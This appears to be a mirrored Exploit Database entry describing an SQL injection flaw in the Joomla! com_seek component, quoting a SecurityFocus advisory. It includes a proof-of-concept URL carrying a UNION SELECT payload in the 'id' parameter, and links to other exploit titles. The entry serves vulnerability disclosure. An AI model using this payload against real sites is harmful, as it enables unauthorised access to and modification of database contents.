Joomla! Component com_seek – ‘id’ SQL Injection

Exploit Database
101 阅读

作者： DevilZ TM

日期： 2010-03-13
类别：
- webapps
平台：
- php
来源：https://www.exploit-db.com/exploits/33756/

source: https://www.securityfocus.com/bid/38711/info

The 'com_seek' component for Joomla! is prone to an SQL-injection vulnerability because it fails to sufficiently sanitize user-supplied data before using it in an SQL query.

Exploiting this issue could allow an attacker to compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database.

http://www.example.com/index.php?option=com_seek&task=list1&id=-1+UNION+SELECT+1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21--

last Exploits
Joomla! Component com_seek – ‘id’ SQL Injection的更多信息

DIY CMS 1.0 Poll – Multiple Vulnerabilities：
phpCollab 2.5.1 – SQL Injection：
Blox CMS – SQL Injection：
WordPress Plugin WF Cookie Consent 1.1.3 – Cross-Site Scripting：
Uiga FanClub – ‘p’ SQL Injection：
MiniWeb HTTP Server 0.8.19 – Buffer Overflow (PoC)：
Miyabi CGI Tools 1.02 – ‘index.pl’ Remote Command Execution：
Flo CMS – ‘archivem’ SQL Injection：